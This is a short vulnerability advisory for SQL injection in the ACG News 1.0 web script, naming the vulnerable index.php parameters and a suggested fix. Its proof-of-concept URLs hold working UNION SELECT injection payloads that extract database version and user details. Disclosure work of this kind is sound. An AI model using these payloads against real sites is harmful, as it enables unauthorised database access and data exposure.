ACG News SQL Injection Software: ACG News 1.0 Vendor link: http://www.altercoder.com Vendor Demo link: http://acgnews.uw.hu/index.php Attack: SQL Injection Original Advisory: http://14house.blogspot.com/2007/08/acg-news-sql-injection.html Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com > SQL Injection ------------- An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file. Proof of Concept: index.php?menu=showarticle&aid=[SQL INJECTION] index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7 index.php?menu=showcat&catid=[SQL INJECTION] index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version Solution: Your script should filter metacharacters from user input. Vendor contacted but I'm waiting for reply.